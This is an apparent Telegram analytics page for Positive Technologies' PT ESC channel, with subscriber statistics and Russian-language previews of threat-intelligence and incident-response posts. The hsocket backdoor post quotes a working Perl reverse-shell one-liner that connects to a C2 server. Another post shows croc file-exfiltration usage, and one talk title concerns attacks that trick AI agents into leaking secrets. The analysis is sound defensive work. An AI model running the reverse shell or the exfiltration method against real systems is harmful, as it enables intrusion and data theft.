en
Feedback
ESCalator

ESCalator

Open in Telegram

Tips and tricks от команды экспертного центра безопасности Positive Technologies (PT ESC)

Show more
8 135
Subscribers
+324 hours
+317 days
+14230 days
Attracting Subscribers
Sep '26
September '26
+206
in 6 channels
August '26
+111
in 2 channels
Get PRO
July '26
+337
in 11 channels
Get PRO
June '26
+249
in 26 channels
Get PRO
May '26
+214
in 3 channels
Get PRO
April '26
+261
in 6 channels
Get PRO
March '26
+289
in 6 channels
Get PRO
February '26
+280
in 7 channels
Get PRO
January '26
+282
in 3 channels
Get PRO
December '25
+328
in 7 channels
Get PRO
November '25
+207
in 7 channels
Get PRO
October '25
+1 645
in 5 channels
Get PRO
September '25
+149
in 4 channels
Get PRO
August '25
+235
in 4 channels
Get PRO
July '25
+324
in 17 channels
Get PRO
June '25
+222
in 6 channels
Get PRO
May '25
+345
in 9 channels
Get PRO
April '25
+299
in 14 channels
Get PRO
March '25
+618
in 25 channels
Get PRO
February '25
+248
in 10 channels
Get PRO
January '25
+444
in 10 channels
Get PRO
December '24
+234
in 4 channels
Get PRO
November '24
+666
in 9 channels
Get PRO
October '24
+416
in 8 channels
Get PRO
September '24
+282
in 5 channels
Get PRO
August '24
+653
in 9 channels
Get PRO
July '24
+1 144
in 3 channels
Date
Subscriber Growth
Mentions
Channels
28 September+4
27 September+6
26 September+3
25 September+6
24 September+6
23 September+9
22 September+6
21 September+12
20 September+8
19 September+17
18 September+26
17 September+10
16 September+6
15 September+9
14 September+5
13 September+9
12 September+4
11 September+5
10 September+18
09 September+2
08 September+1
07 September+5
06 September+4
05 September+12
04 September+5
03 September+4
02 September+3
01 September+1
Channel Posts

2
No text...
794
3
Мы помогли Apple устранить уязвимость в ядре ее операционных систем Эксперт PT ESC Михаил Ложников обнаружил недостаток, кото
Мы помогли Apple устранить уязвимость в ядре ее операционных систем Эксперт PT ESC Михаил Ложников обнаружил недостаток, который мог вызвать внезапное завершение работы системы (сбой ядра) или повреждение памяти ядра (kernel memory corruption) в продукции компании Apple. ⚠️ Уязвимость PT-2026-76847 (CVE-2026-65330) получила средний уровень критичности — 6.5 по шкале CVSS 3.x. Делимся подробностями • Ошибка была обнаружена в BSD-подсистеме сетевого стека XNU (ядра macOS, iOS) в компоненте NECP (Network Extension Control Policy), который управляет правами доступа программ и приложений к сетевым интерфейсам. • Для взаимодействия с NECP требуется процесс с привилегированными правами, подписанный цифровой подписью (platform-signed). • При закрытии NECP-сессии ядро корректно освобождает domain-фильтры, но domain-trie (префиксное дерево доменов) остается в глобальном списке с указателем на уже освобожденную память сессии. • При удалении trie по идентификатору (ID) ядро не проверяет владельца. • Любая другая сессия может удалить чужое префиксное дерево, вследствие чего может произойти ошибка и ядро вызовет панику. 🍏 Скорее обновляйте ваши устройства Apple уже выпустила исправление безопасности в iOS/iPadOS 26.6.1, macOS 26.6.2, tvOS 27, watchOS 27 и visionOS 27. Подробная информация об исправлениях опубликована на официальных страницах Apple: macOS, iOS и iPadOS, tvOS, watchOS и visionOS. #cve #ir #ios #macos @ptescalator
1 742
4
Восстановление EVTX-записей: методы карвинга 🧩 При расследовании инцидентов, когда злоумышленники шифруют образы виртуальных
Восстановление EVTX-записей: методы карвинга 🧩 При расследовании инцидентов, когда злоумышленники шифруют образы виртуальных машин, нередко возникает ситуация, при которой файловая система повреждается настолько, что штатное монтирование становится невозможным. Восстановить ее вручную теоретически можно, но это отнимает много времени и сопровождается потерями данных. В таких случаях применяется карвинг — побайтовый поиск сигнатур непосредственно в сыром образе, в обход файловой системы. ❗️ Команда PT ESC IR уделяет приоритетное внимание автоматизации разбора артефактов для последующего обнаружения вредоносной активности — это ускоряет восстановление картины инцидента. Наш пайплайн преимущественно реализован на Go, поэтому мы разработали собственную библиотеку на том же языке. Она разбирает готовые EVTX-файлы даже при несовпадении контрольных сумм или повреждении файла, а также выполняет карвинг событий из побитовых копий, дампов памяти и образов виртуальных дисков. О том, что поддается восстановлению и почему одни подходы дают полную структуру записи, а другие — лишь отдельные поля, читайте в нашем материале на Хабре 🫲 #ir #dfir #tip @ptescalator
2 177
5
No text...
8 832
6
.exe .docm .xlsm Вредоносные файлы с этими расширениями чаще всего встречаются в сетевом трафике компаний. Давайте базово раз
.exe .docm .xlsm Вредоносные файлы с этими расширениями чаще всего встречаются в сетевом трафике компаний. Давайте базово разберемся, почему. 🖥 .exe — классическое расширение исполняемых файлов в Windows: двойной клик — и у вас запускается Fortnite (не осуждаем), браузер, ваш любимый мессенджер, установщик или любая другая программа. А может запуститься и Trojan или какой-нибудь другой вредонос. Чаще всего вы даже не видите, что у файла именно такое расширение: по умолчанию в Windows включена функция «Скрывать расширения для зарегистрированных типов файлов», из-за чего видно только первую часть имени. И этим пользуются злоумышленники. Например, они маскируют файл под что-нибудь безобидное: вместо zarplaty_sep_2026.pdf.exe вы увидите просто zarplaty_sep_2026.pdf. Подозрений не вызывает, а интерес пробуждает. Клац-клац — и бамц. В общем, для самозащиты рекомендуем отключить эту функцию. Делается просто, зато вы всегда будете знать, на что именно кликаете. 📄 .docm и .xlsm — а это знакомые всем офисным работягам расширения документов Microsoft Office. Их часто перекидывают по электронной почте, чатам и флешкам, так что обычно они не вызывают подозрений. Только что-то тут с последними буквами расширений не так — скажете вы, и будете правы. Вместо x в конце здесь стоит m, а это означает, что такие документы поддерживают макросы — небольшие программы на специальном языке VBA, которые могут выполнять действия внутри документа. Также могут попадаться расширения .dotm и .xltm — это шаблоны документов с поддержкой макросов. И так же, как с .exe, эти расширения по умолчанию скрыты в наименовании файлов в Windows, поэтому вы просто видите иконку документа и его название. Макросы — полезная штука, которая помогает автоматизировать рутинные действия в документах (с их помощью энтузиасты даже умудрились запустить DOOM прямо в Word). Но ими пользуются и злоумышленники: вы открываете вроде бы обычный файл, разрешаете макросы — и на вашем компьютере выполняются заложенные в них команды. Например, они могут запустить системную команду, которая загрузит и запустит другой вредонос. Так вот, к чему мы это решили объяснить 1️⃣ Внимательно следите за тем, что именно вы запускаете и какие разрешения даете. 2️⃣ Наши эксперты с помощью песочницы PT Sandbox проанализировали вредоносную активность, выявленную PT NAD в сетевом трафике организаций с октября 2025 года по июль 2026 года. И как раз 29% опасных файлов оказались с расширением .exe, а 26% — с расширениями Microsoft Office. 3️⃣ Как вы понимаете, эти файлы — только верхушка айсберга из вредоносов. Ниже в сетях были обнаружены и потенциально опасные инструменты, которые выглядят легитимно, различные вариации архивов и более интересные находки. О них — в полной версии исследования на нашем сайте. @ptescalator
5 347
7
TLP: POSITIVE RED №2 25 сентября проведем наш второй митап, на этот раз — в Музее криптографии (55.830677, 37.597678). Будут
TLP: POSITIVE RED №2 25 сентября проведем наш второй митап, на этот раз — в Музее криптографии (55.830677, 37.597678). Будут честные доклады без записи, живое общение и никакой воды (только пенное, снова). Если вы аналитик SOC, специалист по реагированию и расследованию инцидентов или эксперт по исследованию и детектированию угроз, то вам точно зайдет. Программа на вечер (встречаемся в 18:30): 🕖 19:00 — «От инфоповода до атаки: как группировки адаптируют глобальную и российскую повестку под свои операции». Денис Казаков, специалист группы киберразведки PT ESC. 🕢 19:30 — «VantaCore: как вымогатели собирают собственный арсенал». Александр Гантимуров, руководитель направления обратной разработки Angara MTDR. 🕣 20:30 — «История про шифровальщик, который не смог». Дмитрий Логинов, реверс-инженер, CICADA8. 🕘 21:00 — «Follow the __report, knock knock, Remedy». Иван Трофименко, аналитик центра мониторинга и реагирования JET CSIRT. 🕤 21:30 — обсудим томатный гозе и другие важные вопросы. Количество мест ограничено, регистрируйтесь заранее на нашем сайте. @ptescalator
9 910
8
No text...
3 634
9
No text...
3 479
10
Din, din — кто там? 🔔 Группа киберразведки экспертного центра безопасности Positive Technologies обнаружила новую группировк
Din, din — кто там? 🔔 Группа киберразведки экспертного центра безопасности Positive Technologies обнаружила новую группировку, которую мы назвали DENOmination Group. В 2026 году мы зафиксировали ее активность против российских организаций оборонно-промышленного, военного, финансового и консалтингового секторов. Ключевая особенность атак — использование легитимной среды выполнения Deno для запуска вредоносного JavaScript/TypeScript-кода. В исследованных цепочках мы наблюдали загрузчик DinDoor, агент удаленного доступа DenoRAT, вредоносные MSI- и LNK-файлы, ротацию C2-инфраструктуры и несколько связанных способов первоначальной доставки. Пересечения в кодовой базе, конфигурационных параметрах, логике построения цепочек и сетевой инфраструктуре позволили связать наблюдаемые эпизоды с активностью одной группировки. В исследовании разобрали архитектуру DinDoor и DenoRAT, механизмы закрепления и взаимодействия с C2, инфраструктурные пересечения, TTP и возможную модель использования общей платформы несколькими операторами. Подробности — в нашем блоге 🦖 #TI #APT #Malware @ptescalator
2 790
11
Он вам не gsocket 😑 В ходе расследования одного из инцидентов специалисты PT ESC IR наткнулись на весьма диковинный инструме
Он вам не gsocket 😑 В ходе расследования одного из инцидентов специалисты PT ESC IR наткнулись на весьма диковинный инструмент hsocket (не путать с gsocket). После получения первоначального доступа и установки веб-шелла злоумышленники доставили на скомпрометированный веб-сервер три bash-скрипта. 1️⃣ hsocket — бэкдор, имеющий следующий функционал: • запуск интерактивной командной оболочки • запуск эксплойтов для повышения привилегий в Linux-системах (PwnKit, Dirty Pipe, Dirty COW, Netfilter) • сканирование директории на наличие веб-шеллов и их удаление (вероятно, для очистки следов) • защита файлов от удаления • установление reverse shell-соединения с управляющим сервером с помощью кода на Perl: perl -e "use Socket;\$i=\"$hsHOST\";\$p=$hsPORT;socket(S,PF_INET,SOCK_STREAM, getprotobyname('tcp'));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){ open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('sh -i');};" • скачивание и запуск скриптов для поиска ошибок в конфигурации Linux и повышения привилегий (linenum, linpeas) 2️⃣ hfsm — файловый менеджер, который позволяет интерактивно работать с файловой системой: просматривать, редактировать и удалять файлы. 3️⃣ .hsrc — устанавливает полные права на чтение, запись и исполнение файлов hsocket и hfsm, а также создаёт алиасы для запуска данных скриптов. В рамках данного исследования нам удалось обнаружить статью, написанную на индонезийском языке, в которой было описано данное ВПО. Что интересно, веб-шелл, установленный на скомпрометированном сервере, также содержал комментарии и строки на индонезийском: // Fungsi untuk tampilan halaman login $Warning = "### ⚠️Info!! Terdekteksi Aktivitas Dari"; Сам веб-шелл является модифицированной версией Gecko. Об этом говорят комментарии и характерные строки кода: //------------------GECKO SHELL, RECODED BY AYANA--------------------// <!-- Gecko Folder File Manager --> IoC: hsocket.io /tmp/hs-data/ #ir #dfir #detect #ioc #malware @ptescalator
2 803
12
No text...
3 318
13
We will croc you 👻 PhantomCore продолжает активно использовать ошибки в конфигурации 1С для атак на российские организации.
We will croc you 👻 PhantomCore продолжает активно использовать ошибки в конфигурации 1С для атак на российские организации. Об атаках на 1С с помощью 1cshell мы писали ранее (1, 2, 3). В рамках расследования инцидента команда PT ESC IR обнаружила компрометацию сервера 1С, работающего на операционной системе семейства Linux 🐧 Среди характерных признаков — наличие вредоносных исполняемых файлов в подкаталогах домашней директории служебного пользователя usr1cv8 и команд в .bash_history того же пользователя — в частности просмотр и удаление файла res.txt, в который записывается результат выполнения кода посредством 1cshell. /home/usr1cv8/.bash_history: cat res.txt /home/usr1cv8/.bash_history: rm res.txt После получения доступа в систему PhantomCore установили ReverseSSH-туннель, что является типичным поведением для данной группировки. 🕵️‍♂️ Помимо часто используемого инструментария, мы встретили и более диковинную утилиту croc, предназначенную для удаленной загрузки и эксфильтрации файлов. На исследуемом узле были обнаружены команды формата: CROC_SECRET=[REDACTED] ./croc С помощью нее злоумышленники могли загрузить на скомпрометированный узел файл, который был предварительно отправлен через веб-интерфейс https://getcroc.com/ (на скриншоте) или с другого компьютера, на котором установлен croc. 💡 Для поиска следов использования croc можно поискать исполняемый файл с соответствующим именем, а также использование переменной окружения CROC_SECRET. В качестве сетевого индикатора может служить домен getcroc.com. #ir #tip #apt #detect #dfir @ptescalator
3 627
14
No text...
3 881
15
No text...
4 906
16
Минус один пернатый вор — плюс сто очков рейтинга! 😵 Команда Threat Intelligence экспертного центра безопасности Positive Te
Минус один пернатый вор — плюс сто очков рейтинга! 😵 Команда Threat Intelligence экспертного центра безопасности Positive Technologies обнаружила кампанию восточноазиатской группировки FamousSparrow. Группировка использовала новый бэкдор, который мы назвали SquawkDoor, а также новую версию известного бэкдора SparrowDoor 🏴‍☠️ Группировка встраивала вредоносные JS-скрипты на сайты из разных стран. Они показывали пользователю якобы ошибку сертификата на определенном языке и предлагали скачать новый сертификат, который являлся MSI-файлом и приводил к заражению вредоносным бэкдором. 😳 Мы проанализировали бэкдоры: подробно показали новый SquawkDoor и провели детальный анализ отличий нового SparrowDoor от старой версии, а также связанных с ними HemiGate, TernDoor и CrowDoor. Помимо этого, мы нашли различные пересечения с другими злоумышленниками из Восточной Азии. Также в процессе анализа мы обнаружили связанного с группой пентестера, который готовил атаки. О том, какие приложения ранее взламывал злоумышленник и какие у него фетиши — читайте в нашем блоге 😏 #TI #APT #Malware @ptescalator
3 895
17
DragonDoll: матрешка в мире Android-шпионов 🪆 В начале этой весны специалисты PT ESC обнаружили неизвестный ранее APK-файл,
DragonDoll: матрешка в мире Android-шпионов 🪆 В начале этой весны специалисты PT ESC обнаружили неизвестный ранее APK-файл, загруженный из Саудовской Аравии. Сам образец содержал много приемов Defense Evasion. Для усложнения анализа было использовано: • 1 техника BadPack • 2 этапа загрузки нативных библиотек • 1 обфускация на основе LLVM • 6 проверок на выполнение в виртуальной среде • и несчитанное количество MBA-выражений После долгих страданий этапов анализа, с помощью сил эмуляции, законов булевой алгебры и нескольких сотен строк кода наши специалисты распаковали новый Android-шпион DragonDoll 📱 В ходе исследования мы наткнулись на масштабную атаку с участием данного ВПО, направленную на пользователей Android из более чем 26 стран, включая и Россию. Злоумышленники использовали GitHub как источник распространения и постоянного обновления DragonDoll. Ссылка на этот репозиторий привела на сеть поддельных сайтов с «обновлением» Chrome, содержание которых адаптировалось под язык жертвы. Разбор того, что лежало под слоем обфускации — в нашем блоге ⬅️ #TI #Android #Malware @ptescalator
3 927
18
No text...
3 492
19
Едем на OFFZONE 2026 На этой неделе постов не было, зато на следующей — выступим с докладами на OFFZONE. Если будете, то захо
Едем на OFFZONE 2026 На этой неделе постов не было, зато на следующей — выступим с докладами на OFFZONE. Если будете, то заходите. А если не зайдете, то получите потом записи, но не все. ➡️ «Девиртуализация Warbird с помощью LLVM» / 20 августа, 14:00 Warbird — это внутренняя, официально недокументированная технология Microsoft для защиты кода и DRM. Мало кто знает, но Warbird также имеет виртуализацию, реализованную в нескольких компонентах ядра Windows: ci.dll, clipsp.sys и peauth.sys. На докладе Павел Максютин, ведущий специалист отдела экспертизы PT Sandbox, расскажет о современных подходах к девиртуализации, об устройстве виртуальной машины Warbird и как ему удалось ее сломать с помощью бинарной трансляции и LLVM. ➡️ Et tu, OpenCode: как злоумышленники атакуют агентов и выманивают ваши секреты / 20 августа, 16:10 Наступление эры агентских систем «подарило» злоумышленникам новые векторы атак на пользователей. Чего они добиваются и какие новые техники используют в отношении ассистентов и агентов, расскажет Станислав Раковский, руководитель группы Supply Chain Security. А еще будет практическая проверка того, насколько безопасно использовать ревью коммитов на основе опенсорсных и коммерческих LLM. ➡️ Дочирикались / 21 августа, 16:30 Название доклада отсылает к одной восточноазиатской группировке, которая атаковала цели в Южной Азии и Европе. Злоумышленники внедряли на взломанные легитимные сайты вредоносный JS, подменявший страницы фейковой установкой сертификата и загружавший ранее неизвестный бэкдор. Максим Шаманов и Александр Бадаев, специалисты TI-департамента PT ESC, расскажут о серьезных OPSEC-ошибках, которые допустили злоумышленники. Будут и другие доклады от ребят из Позитива — про них в этом посте 😠 @ptescalator
3 971
20
В международный день пенного самое время спросить…
4 226